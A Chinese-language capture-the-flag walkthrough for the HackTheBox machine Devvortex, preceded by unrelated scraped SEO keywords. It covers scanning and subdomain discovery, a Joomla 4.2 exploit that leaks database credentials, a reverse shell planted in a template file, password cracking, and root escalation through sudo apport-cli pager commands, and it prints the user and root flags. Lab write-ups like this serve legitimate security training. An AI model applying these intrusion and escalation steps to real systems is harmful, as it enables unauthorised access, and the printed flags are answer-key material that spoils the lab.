网站建设立项申请书,课程推广,还有哪些网站可以做淘宝活动吗,wordpress 柚子文章目录 信息搜集解题步骤提交flag 信息搜集
扫描端口
nmap -sV -sC -p- -v --min-rate 1000 10.10.11.242发现80端口有http服务#xff0c;并且是nginx服务 尝试访问web界面#xff0c;发现跳转到http://devvortex.htb/无法访问 我们用vim添加该域名即可
sudo vim /etc/… 文章目录 信息搜集解题步骤提交flag 信息搜集
扫描端口
nmap -sV -sC -p- -v --min-rate 1000 10.10.11.242发现80端口有http服务并且是nginx服务 尝试访问web界面发现跳转到http://devvortex.htb/无法访问 我们用vim添加该域名即可
sudo vim /etc/hosts我们访问发现是企业站点扫描一下是否存在子域名
gobuster vhost -u http://devvortex.htb/ -w /usr/share/wordlists/dirb/big.txt --append-domain得到子域名 和刚刚一样添加到/etc/hosts然后扫描目录
解题步骤
能扫出/adminisrator我们登录web界面访问robots.txt 知道为Joomla CMS 我们用kali自带的工具去扫描出Joomla版本信息
joomscan -u http://dev.devvortex.htb/然后再利用工具searchsploit去找漏洞
searchsploit joomla 4.2然后记住该脚本序号使用-m参数复制下来 此脚本是ruby编写的所以执行命令如下
./51334.py http://dev.devvortex.htb joomla_exp.out注url不为http://dev.devvortex.htb/
查看一下得到密码数据库名
由于ssh连接不上我们采取反弹shell 用刚刚的账号密码登录 然后在System的site template网站模板处点击第一个 然后修改error.php添加反弹shell命令 开启监听访问给的路径/templates/cassiopeia/error.php 成功反弹shell 但是我们发现目前用户的权限不够
那么我们尝试登录其他用户 先提升下shell权限
python3 -c import pty; pty.spawn(/bin/bash)再连接数据库
mysql -u lewis -p joomla然后得到logan的密码 用工具john爆破一下得到密码 然后ssh连接
ssh logan10.10.11.242得到user的flag 我们sudo看下能用的命令 发现有个脚本我们谷歌尝试搜一下apport-cli exploit 直接搜到现成的poc
靶机有crash文件情况 刚开始ls还没找到加个参数-al才发现有
执行命令
sudo /usr/bin/apport-cli -c /var/crash/_usr_bin_sleep.1000.crash选择v模式 进入文件后输入!id成功提权
查询完按回车再次输入!cat /root/root.txt 得到root的flag
靶机无crash文件情况 我们目的就是开启V模式那么我们可以利用-f和–pid参数 我们开启pid进程 然后执行
sudo /usr/bin/apport-cli -f --pid4365同样能进入V模式 后面步骤就一样的不再叙述
提交flag
user: dc5d3636a25c08eab2b633c3af454cc2
root: 72254d1c628607e1670942d1ba21b4de
